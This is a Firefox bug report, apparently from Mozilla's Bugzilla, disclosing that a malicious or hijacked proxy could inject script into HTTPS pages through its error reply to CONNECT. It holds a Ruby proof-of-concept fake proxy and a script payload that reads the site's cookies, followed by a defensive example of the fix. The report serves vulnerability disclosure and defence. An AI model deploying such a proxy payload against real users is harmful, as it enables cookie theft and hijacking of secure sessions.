Closed Bug 488386 Opened 16 years ago Closed 16 years ago

SSL MiTM on Firefox while using a Proxy by doing Hi-Jacking the Proxy

Categories: Firefox :: Security, defect
Severity: major
Status: RESOLVED DUPLICATE of bug 479880
Reporter: Hugo; Assignee: Unassigned
Whiteboard: [sg:dupe 479880]

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.8) Gecko/2009032608 Firefox/3.0.8

When the browser performs a CONNECT request on a proxy to establish an SSL connection, and the proxy returns an error message containing HTML (and JavaScript), the HTML code will be displayed and executed in the HTTPS website context.

An attacker can take advantage of this by becoming their victim's proxy (i.e. by performing a MiTM between them and their proxy) or by forcing the user to use them as proxy if they have Proxy Auto Config enabled.

Here are examples of the connection:

CONNECT bugzilla.mozilla.org:443 HTTP/1.1

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Type: text/html
Content-Length: 257

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0//EN'>
<HTML>
<HEAD><TITLE>W00t</TITLE></HEAD>
<SCRIPT>
document.write('URL:'+document.location)
document.write('<BR>Cookie<BR>'+document.cookie)
</SCRIPT>
<BODY>
p0wned this is Hugo Website!
</BODY>
</HTML>

Here would be the displayed text:

URL:https://bugzilla.mozilla.org/
Cookie
dloadday=74.198.12.7.1226018811245284; __utma=150903082.903216627.1231182983.1231182983.1231182983.1; __utmz=150903082.1231182983.1.1.utmccn=(organic)|utmcsr=google|utmctr=mozilla+security|utmcmd=organic; Bugzilla_login=censured; Bugzilla_logincookie=censured
p0wned this is Hugo Website!

Here is the PoC code:

#!/usr/bin/ruby
require 'socket'

# HTML page that the fake proxy sends as the body of its CONNECT error reply
doc = "<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.0//EN'>
<HTML>
<HEAD><TITLE>W00t</TITLE></HEAD>
<SCRIPT>
document.write('URL:'+document.location)
document.write('<BR>Cookie<BR>'+document.cookie)
</SCRIPT>
<BODY>
p0wned this is Hugo Website!
</BODY>
</HTML>"

# Complete HTTP error response returned for every request
test = "HTTP/1.1 500 Internal Server Error
Connection: close
Content-Type: text/html
Content-Length: #{doc.length}

#{doc}"

# Listen as a proxy on port 8888 and answer each connection with the error page
server = TCPServer.new('0.0.0.0', 8888)
while (session = server.accept)
  puts "Request: #{session.gets}"
  session.print test
  puts test
  session.close
end

Reproducible: Always

Steps to Reproduce:
1. Execute the PoC malicious proxy code
2. Configure the Firefox browser to use that proxy on port (8888)
3. Go to an SSL website

Actual Results:
SSL MiTM

Expected Results:
Not display HTML code, but a predefined error message instead.
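The report's "Expected Results" describes the client-side fix: a non-2xx reply to CONNECT must never have its body handed to the renderer under the target https:// origin. The following is an added example written for this page (not Firefox code and not the reporter's PoC) showing that handling; handle_connect_response, ConnectResult and the two sample replies are assumed names and constructed inputs modelled on the report.

```ruby
# Added example (not Firefox code): how a client should treat the proxy's
# reply to CONNECT so that a failed tunnel never renders proxy-supplied HTML
# in the target https:// origin. handle_connect_response and ConnectResult
# are assumed names for this illustration.
ConnectResult = Struct.new(:status, :tunnel_ok, :dropped_body_bytes,
                           :html_in_error, :user_message)

def handle_connect_response(raw, target_host)
  head, _sep, body = raw.partition(/\r?\n\r?\n/)
  status_line, *header_lines = head.split(/\r?\n/)
  m = status_line.to_s.match(%r{\AHTTP/1\.[01] (\d{3}) ?(.*)\z})
  raise ArgumentError, "malformed CONNECT status line: #{status_line.inspect}" unless m
  status = m[1].to_i
  headers = header_lines.each_with_object({}) do |line, h|
    name, value = line.split(':', 2)
    h[name.strip.downcase] = value.to_s.strip if name && value
  end

  if (200..299).cover?(status)
    # 2xx: the tunnel is up. Anything after the header block is the start of
    # the TLS handshake with target_host, not an HTTP body, so nothing here
    # is ever parsed as HTML.
    return ConnectResult.new(status, true, 0, false, nil)
  end

  # Non-2xx: the proxy refused the tunnel. The body is dropped no matter what
  # Content-Type claims; the user gets a fixed, browser-generated message that
  # carries only the status code, never proxy markup shown under the target origin.
  # html_in_error is kept as a signal worth logging: an HTML body on a failed
  # CONNECT is exactly the pattern this bug report describes.
  html = headers['content-type'].to_s.downcase.start_with?('text/html') && !body.empty?
  ConnectResult.new(status, false, body.bytesize, html,
                    "Proxy refused the connection to #{target_host} (HTTP #{status} #{m[2]}).")
end

# Constructed inputs modelled on the report: a hostile 500 with an HTML body,
# and the normal reply for a working tunnel.
HOSTILE_REPLY = "HTTP/1.1 500 Internal Server Error\r\nConnection: close\r\n" \
                "Content-Type: text/html\r\nContent-Length: 32\r\n\r\n" \
                "<HTML><BODY>p0wned</BODY></HTML>"
OK_REPLY = "HTTP/1.1 200 Connection established\r\n\r\n"

if __FILE__ == $PROGRAM_NAME
  [HOSTILE_REPLY, OK_REPLY].each do |reply|
    r = handle_connect_response(reply, 'bugzilla.mozilla.org')
    puts "status=#{r.status} tunnel=#{r.tunnel_ok} dropped=#{r.dropped_body_bytes}B " \
         "html_error=#{r.html_in_error} msg=#{r.user_message.inspect}"
  end
end
```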
I am pretty sure this is a dupe of bug 479880.
Yes, this is the same issue.
Status: UNCONFIRMED → RESOLVED
Closed: 16 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 479880]
Group: core-security